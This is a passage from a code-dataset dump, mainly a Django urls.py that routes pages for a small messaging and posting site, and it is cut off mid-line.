\\n \" + jsonMessage\n\n","sub_path":"ApiEndpoint/serviceMessages.py","file_name":"serviceMessages.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"356987533","text":"\"\"\"mysite URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.urls import path, include\r\nfrom django.conf.urls import url\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nfrom django.views.generic import TemplateView\r\nfrom main import views\r\nfrom main import views as core_views\r\n\r\napp_name = \"main\"\r\n\r\nurlpatterns = [\r\n path(\"\", views.index, name=\"index\"),\r\n path('admin/', admin.site.urls),\r\n path('about/', views.about, name='about'),\r\n path('signup/', views.signup, name='signup'),\r\n path('login/', views.login, name='login'),\r\n path('results/', views.SearchView, name='search'),\r\n path('([0-9]+)/([a-zA-Z0-9]+)/DM/', views.DMPost, name='DMPost'),\r\n path('([0-9]+)/message/', views.message, name='message'),\r\n path('([0-9]+)/msg/', views.msg, name='msg'),\r\n path('([a-zA-Z0-9]+)/inbox/', views.inbox, name='inbox'),\r\n path('notifications/', views.removeNotifications, name='removeNotifications'),\r\n path('([0-9]+)/post/', views.post_detail, name='post_detail'),\r\n path('(